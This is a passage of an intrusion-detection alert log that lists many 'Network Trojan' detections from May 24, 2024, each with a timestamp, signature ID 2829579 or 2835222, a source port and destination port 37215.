              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233745
              SID:2829579
              Source Port:54638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040831
              SID:2829579
              Source Port:57992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245437
              SID:2829579
              Source Port:52942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189438
              SID:2835222
              Source Port:39780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639921
              SID:2835222
              Source Port:33774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448679
              SID:2835222
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303410
              SID:2829579
              Source Port:44174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164502
              SID:2829579
              Source Port:33304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374823
              SID:2829579
              Source Port:40268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118504
              SID:2835222
              Source Port:42424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595467
              SID:2835222
              Source Port:41096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548202
              SID:2829579
              Source Port:59292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121529
              SID:2835222
              Source Port:54988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113447
              SID:2829579
              Source Port:59392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.881628
              SID:2829579
              Source Port:47400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860062
              SID:2829579
              Source Port:37714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857146
              SID:2835222
              Source Port:35528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254390
              SID:2835222
              Source Port:53318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422272
              SID:2829579
              Source Port:53620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584811
              SID:2835222
              Source Port:39224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268444
              SID:2835222
              Source Port:47730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371944
              SID:2829579
              Source Port:56954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642113
              SID:2835222
              Source Port:38188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431227
              SID:2829579
              Source Port:54854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054197
              SID:2835222
              Source Port:57686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837425
              SID:2835222
              Source Port:53902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552371
              SID:2829579
              Source Port:34038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188857
              SID:2835222
              Source Port:52412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375103
              SID:2829579
              Source Port:48388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451080
              SID:2835222
              Source Port:49828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976745
              SID:2829579
              Source Port:48738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398270
              SID:2835222
              Source Port:37662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486470
              SID:2835222
              Source Port:45026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856947
              SID:2835222
              Source Port:35220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823400
              SID:2835222
              Source Port:51276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197977
              SID:2829579
              Source Port:46488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230803
              SID:2835222
              Source Port:56856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579688
              SID:2835222
              Source Port:48118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661131
              SID:2835222
              Source Port:43800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064506
              SID:2835222
              Source Port:50088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457680
              SID:2835222
              Source Port:56874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576406
              SID:2835222
              Source Port:35844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231561
              SID:2829579
              Source Port:50638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474141
              SID:2829579
              Source Port:57432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065812
              SID:2835222
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430066
              SID:2835222
              Source Port:49284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701587
              SID:2829579
              Source Port:34838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661915
              SID:2829579
              Source Port:34754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486856
              SID:2829579
              Source Port:52086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071542
              SID:2835222
              Source Port:53782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073647
              SID:2829579
              Source Port:40618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725727
              SID:2835222
              Source Port:48594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365160
              SID:2835222
              Source Port:40930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118944
              SID:2835222
              Source Port:37374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187979
              SID:2835222
              Source Port:43852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375093
              SID:2829579
              Source Port:53598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303174
              SID:2829579
              Source Port:49294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.185929
              SID:2829579
              Source Port:55360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487271
              SID:2835222
              Source Port:47494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441327
              SID:2835222
              Source Port:48938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241991
              SID:2829579
              Source Port:58150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990933
              SID:2829579
              Source Port:44688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625670
              SID:2835222
              Source Port:33850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313324
              SID:2835222
              Source Port:36488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537053
              SID:2829579
              Source Port:43520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882766
              SID:2835222
              Source Port:40944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041102
              SID:2829579
              Source Port:55738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.146955
              SID:2829579
              Source Port:59194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586081
              SID:2829579
              Source Port:37874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802316
              SID:2829579
              Source Port:47476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152785
              SID:2829579
              Source Port:36636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766273
              SID:2835222
              Source Port:40416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186198
              SID:2835222
              Source Port:50648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492287
              SID:2829579
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210224
              SID:2829579
              Source Port:45206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204305
              SID:2829579
              Source Port:48194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118305
              SID:2829579
              Source Port:51146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156824
              SID:2829579
              Source Port:59136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060983
              SID:2835222
              Source Port:44906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486515
              SID:2835222
              Source Port:52106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860127
              SID:2829579
              Source Port:35956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.964020
              SID:2829579
              Source Port:35748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703452
              SID:2835222
              Source Port:53018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975310
              SID:2835222
              Source Port:57140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121375
              SID:2829579
              Source Port:58816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341234
              SID:2835222
              Source Port:51212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924220
              SID:2829579
              Source Port:52280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076954
              SID:2829579
              Source Port:33110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576414
              SID:2835222
              Source Port:35158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341374
              SID:2829579
              Source Port:39730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040894
              SID:2835222
              Source Port:60014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395976
              SID:2829579
              Source Port:39954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340765
              SID:2829579
              Source Port:39740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589115
              SID:2835222
              Source Port:42968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664519
              SID:2829579
              Source Port:38722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490983
              SID:2835222
              Source Port:55106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113668
              SID:2829579
              Source Port:55534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186962
              SID:2835222
              Source Port:52940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432214
              SID:2829579
              Source Port:50664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542171
              SID:2829579
              Source Port:40722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449251
              SID:2829579
              Source Port:40956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161635
              SID:2829579
              Source Port:34716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494730
              SID:2835222
              Source Port:41972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098289
              SID:2829579
              Source Port:59964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766439
              SID:2829579
              Source Port:45698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363252
              SID:2829579
              Source Port:34380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926886
              SID:2835222
              Source Port:56570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696233
              SID:2829579
              Source Port:41178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189491
              SID:2835222
              Source Port:38732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329743
              SID:2835222
              Source Port:44720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483697
              SID:2835222
              Source Port:41024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489740
              SID:2829579
              Source Port:49114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738765
              SID:2829579
              Source Port:38008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965876
              SID:2829579
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167451
              SID:2835222
              Source Port:46946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481857
              SID:2835222
              Source Port:38838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481388
              SID:2829579
              Source Port:56566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928617
              SID:2829579
              Source Port:60964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165537
              SID:2829579
              Source Port:34050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151132
              SID:2835222
              Source Port:55778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432311
              SID:2835222
              Source Port:37534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404303
              SID:2829579
              Source Port:48830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448714
              SID:2835222
              Source Port:56892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581838
              SID:2829579
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458110
              SID:2835222
              Source Port:49530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969018
              SID:2835222
              Source Port:58252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725535
              SID:2829579
              Source Port:36536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189004
              SID:2829579
              Source Port:56126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575193
              SID:2829579
              Source Port:41530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661021
              SID:2829579
              Source Port:45270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186944
              SID:2835222
              Source Port:57702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502535
              SID:2835222
              Source Port:37324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151035
              SID:2829579
              Source Port:46196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516491
              SID:2835222
              Source Port:43874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329686
              SID:2835222
              Source Port:37102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857397
              SID:2835222
              Source Port:44854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517352
              SID:2835222
              Source Port:40676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503006
              SID:2829579
              Source Port:53272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368731
              SID:2835222
              Source Port:36544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969358
              SID:2835222
              Source Port:39998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204761
              SID:2829579
              Source Port:53808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420437
              SID:2829579
              Source Port:52348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726748
              SID:2829579
              Source Port:36236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098237
              SID:2829579
              Source Port:38568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574779
              SID:2829579
              Source Port:40996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625603
              SID:2829579
              Source Port:56550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724329
              SID:2829579
              Source Port:55104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116560
              SID:2829579
              Source Port:35050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.385666
              SID:2835222
              Source Port:48424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404535
              SID:2829579
              Source Port:44742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598010
              SID:2835222
              Source Port:55660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530879
              SID:2835222
              Source Port:50184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425502
              SID:2829579
              Source Port:36084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631866
              SID:2829579
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230841
              SID:2829579
              Source Port:45008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154227
              SID:2829579
              Source Port:34250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926911
              SID:2835222
              Source Port:44394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506502
              SID:2835222
              Source Port:51974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489543
              SID:2829579
              Source Port:35784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279745
              SID:2835222
              Source Port:56920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625275
              SID:2829579
              Source Port:44500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.393884
              SID:2835222
              Source Port:59438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040452
              SID:2829579
              Source Port:51108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764497
              SID:2835222
              Source Port:41746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148748
              SID:2829579
              Source Port:52652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045297
              SID:2829579
              Source Port:50936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098841
              SID:2829579
              Source Port:36558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574749
              SID:2829579
              Source Port:49596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109260
              SID:2829579
              Source Port:45756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879368
              SID:2829579
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252627
              SID:2829579
              Source Port:50440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551348
              SID:2835222
              Source Port:43044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965701
              SID:2829579
              Source Port:36868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.434528
              SID:2829579
              Source Port:55690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109422
              SID:2829579
              Source Port:35258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422198
              SID:2829579
              Source Port:50376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119770
              SID:2835222
              Source Port:56652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539870
              SID:2835222
              Source Port:60340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383284
              SID:2829579
              Source Port:59978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396207
              SID:2835222
              Source Port:58772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404540
              SID:2829579
              Source Port:50682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109577
              SID:2835222
              Source Port:37070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303368
              SID:2829579
              Source Port:44560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382910
              SID:2829579
              Source Port:42310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441364
              SID:2835222
              Source Port:44304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.124182
              SID:2829579
              Source Port:55200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530800
              SID:2829579
              Source Port:37938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062215
              SID:2835222
              Source Port:59944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112633
              SID:2835222
              Source Port:52132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347787
              SID:2835222
              Source Port:48028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485229
              SID:2835222
              Source Port:48614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478245
              SID:2829579
              Source Port:60488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105808
              SID:2829579
              Source Port:50406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700531
              SID:2829579
              Source Port:58480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.822959
              SID:2829579
              Source Port:58020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234711
              SID:2829579
              Source Port:50964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871644
              SID:2835222
              Source Port:41298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
